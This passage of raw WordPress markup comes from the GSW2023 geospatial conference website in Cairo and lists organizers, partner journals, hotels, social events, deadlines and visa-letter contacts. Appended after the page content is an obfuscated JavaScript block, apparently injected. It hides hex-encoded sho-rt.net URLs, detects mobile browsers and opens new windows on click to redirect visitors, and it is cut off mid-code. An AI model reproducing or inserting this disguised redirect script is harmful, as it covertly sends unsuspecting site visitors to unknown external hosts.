height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( 